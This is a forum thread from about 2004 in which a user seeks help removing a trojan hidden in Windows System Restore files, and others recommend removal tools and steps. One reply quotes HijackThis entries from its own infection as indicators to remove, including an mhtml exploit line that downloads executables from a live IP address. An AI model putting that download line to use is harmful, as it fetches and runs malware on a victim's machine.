AVG Problem, I think

  • Thread starter Thread starter Love That Music
  • Start date Start date
L

Love That Music

Hate to appear stupid, but I get a pop-up message that I have a trojan
and to run AVG to get rid of it. I've run AVG regular and in safe
mode, with no effect. (Popup reads : G:\System Volume Information \
-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
I've tried RegSupreme, Spybot, McAfee, with result showing that there
is no problem, but I still get the popup. Does anyone have a
suggestion to help me? Thank you, in advance.
Earl Sande
 
Love said:
Hate to appear stupid, but I get a pop-up message that I have a trojan
and to run AVG to get rid of it. I've run AVG regular and in safe
mode, with no effect. (Popup reads : G:\System Volume Information \
-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
I've tried RegSupreme, Spybot, McAfee, with result showing that there
is no problem, but I still get the popup. Does anyone have a
suggestion to help me? Thank you, in advance.
Earl Sande
Click to expand...


Had a similar message on my WinME system, don't know what you're
using. I turned off my system restore, used A Squared at
http://www.emsisoft.com/en/ to get rid of the Trojan, then rebooted,
rechecked with A Squared and all now OK. Before I turned off Sys
Restore, the Trojan was just being restored every time.
HTH
KeithS
 
Love That Music <[email protected]> wrote:
Click to expand...
Hate to appear stupid, but I get a pop-up message that I have a trojan
and to run AVG to get rid of it. I've run AVG regular and in safe
mode, with no effect. (Popup reads : G:\System Volume Information \
-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
I've tried RegSupreme, Spybot, McAfee, with result showing that there
is no problem, but I still get the popup. Does anyone have a
suggestion to help me? Thank you, in advance.
Earl Sande
Click to expand...

It sounds like you have a contamination. I had one awhile back and I'm
totally at a loss as to how I got it. It hid within the System Restore
folder as yours has, so it might be a related malware. Mine had a
startup entry that redownloaded the virus. I did several complete
reinstalls and each was contaminated before I could get the critical
updates for XP. I'm guessing that the problem was a security breach in
XP that allowed it back in before I could get the patch, even though I
went straight to MS after each reinstall.

AVG didn't do anything for this. AntiVir was recommended here and it
did catch and clean, but that was only part of the solution. I had to
use HiJackThis to remove the startup entries that redownloaded the
infection and called another infected file that hides in the recycle
bin, which many scanners do not scan by default.


AntiVir Personal Edition:
http://www.free-av.com/

HiJackThis:
http://www.spywareinfo.com/~merijn/files/hijackthis.zip
http://www.spywareinfo.com/~merijn/index.html


These are the two entries I had to remove with HijackThis:
----------------------------------------------------------------------------------------------------------------------------------
O16 - DPF: {11111111-1111-1111-1111-111111111111} -
mhtml:file://C:NXSFT.MHT!http://66.117.38.54:80/iex/ofile.exe?url=http://66.117.38.54:80/dexUS604.exe

O16 - DPF: {11111111-1111-1111-1111-111111111123} -
file://c:\Recycled\1.exe
----------------------------------------------------------------------------------------------------------------------------------

The first is an mhtml exploit that redownloads the infection. The
second is a call to an infected file hiding in the recycle bin.

AntiVir will get the part hiding in your System Restore and on your
boot drive.

You will need to disable AVG. You don't want to run two virus
scanners. I think that after you experience AntiVir you will agree
that it is by far superior to AVG. It can clean the malwares.

I spent a whole bunch of time on this infection and I hope this will
prevent you from doing the same. If you are not patched you will need
the mhtml patch for sure to prevent further infections.

Good luck!
 
Love That Music said:
Hate to appear stupid, but I get a pop-up message that I have a trojan
and to run AVG to get rid of it. I've run AVG regular and in safe
mode, with no effect. (Popup reads : G:\System Volume Information \
-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
I've tried RegSupreme, Spybot, McAfee, with result showing that there
is no problem, but I still get the popup. Does anyone have a
suggestion to help me? Thank you, in advance.
Earl Sande
Click to expand...

Disable System Restore, scan for viruses, then reboot and re-enable System
Restore. How to disable and enable System Restore in Windows XP:
http://service1.symantec.com/SUPPOR...2001111912274039?OpenDocument&src=sec_doc_nam

Regards,
Ian.
 
Hate to appear stupid, but I get a pop-up message that I have a trojan
and to run AVG to get rid of it. I've run AVG regular and in safe
mode, with no effect. (Popup reads : G:\System Volume Information \
-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
I've tried RegSupreme, Spybot, McAfee, with result showing that there
is no problem, but I still get the popup. Does anyone have a
suggestion to help me? Thank you, in advance.
Earl Sande
Click to expand...

any .scr (screensaver) would be a suspect for a trojan or virus, a real
common form of transmission
 
Doc said:
any .scr (screensaver) would be a suspect for a trojan or virus, a real
common form of transmission
Click to expand...
Check your startup programs (use msconfig with win 98) and see if
A0037876.scr is there. Disable it. Many viruses put themselves in
startup. The cleaner gets rid of them elsewhere but leaves them in startup.

GA
 
Thanks for all the help. Day 2 and all seems to be fixed. You people
are GREAT!
Earl
 
Out of curousity, how did you get rid of the bug?
ASquared was recommended to me, but at the time it did not detect the
infection.

What freeware tools did you use?
Click to expand...

I turned off the System Restore, then used the ASquared. ASquared
didn't report finding any malware (although, let me write that I was
very impressed with the program in it showing what files were being
examined). Re-booted. Then turned on the System Restore. So Far -
Fingers crossed - there's no popup for the trojan.

Earl
 
Hate to appear stupid, but I get a pop-up message that I have a trojan
and to run AVG to get rid of it. I've run AVG regular and in safe
mode, with no effect. (Popup reads : G:\System Volume Information \
-restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
I've tried RegSupreme, Spybot, McAfee, with result showing that there
is no problem, but I still get the popup. Does anyone have a
suggestion to help me? Thank you, in advance.
Earl Sande
Click to expand...

I have seen this problem before. The trojan is inside your System
Restore files. AVG does not actually scan these files as default.
One way to get rid of this trojan is by doing a complete system
re-install, which isn't really the best option. Another way (and I
have only heard about this, never tried it so no comebacks please) is
to disable your System Restore program, run AVG, then once it has
found and cleansed the files, re-enable System Restore if you wish.

I would like to point out that a lot of people I have spoken to do not
actually recommend that the Windows System Restore is used, I myself
have had problems with it. There are other Restore programs available
but I have not used any.

Bebi

Quid sit futurum cras, fuge quaerere
 
: Hate to appear stupid, but I get a pop-up message that I have a trojan
: and to run AVG to get rid of it. I've run AVG regular and in safe
: mode, with no effect. (Popup reads : G:\System Volume Information \
: -restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
: I've tried RegSupreme, Spybot, McAfee, with result showing that there
: is no problem, but I still get the popup. Does anyone have a
: suggestion to help me? Thank you, in advance.
: Earl Sande

Also,is AVG up to date? The latest was 16 July 2004.
 
Helen said:
G:\System Volume Information \
: -restore {2BD9D7AA-8D5E-49FC-A916-IDBCF81 68930}\RP258\A0037876.scr)
Click to expand...

your restore backup you the virus that is seting it off is in your
restore turn restore on and off that should fix it did for me :)
 
Back
Top